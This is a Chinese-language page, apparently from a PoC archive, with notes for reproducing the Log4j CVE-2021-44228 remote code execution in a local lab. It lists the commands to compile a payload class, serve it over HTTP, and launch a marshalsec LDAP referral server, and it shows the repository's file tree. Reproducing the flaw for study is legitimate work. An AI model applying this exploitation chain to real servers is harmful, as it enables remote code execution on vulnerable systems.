关联漏洞
描述
Apache Log4j CVE-2021-44228 漏洞复现
介绍
## Log4j2复现笔记,仅供学习
参考https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
### 创建可执行文件
```
com/example/template
javac Log4jRCE.java
```
### 启动Python自带的HTTP服务器
```
com/example/template
python -m http.server 8888
```
### 启动LDAP服务器
```
tools
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"
```
### 模拟注入攻击提交表单
```
com/example/hack/Hack.java
```
文件快照
[4.0K] /data/pocs/09c37dd00a30b239e787b28e431532a69cf52da2
├── [ 990] pom.xml
├── [ 498] README.md
├── [4.0K] src
│ └── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] com
│ │ └── [4.0K] example
│ │ ├── [4.0K] hack
│ │ │ └── [ 403] Hack.java
│ │ ├── [ 375] Log4jRCETest.java
│ │ └── [4.0K] template
│ │ ├── [ 609] Log4jRCE.class
│ │ └── [ 296] Log4jRCE.java
│ └── [4.0K] resources
│ └── [2.2K] log4j2.xml
└── [4.0K] tools
└── [ 41M] marshalsec-0.0.3-SNAPSHOT-all.jar
9 directories, 8 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。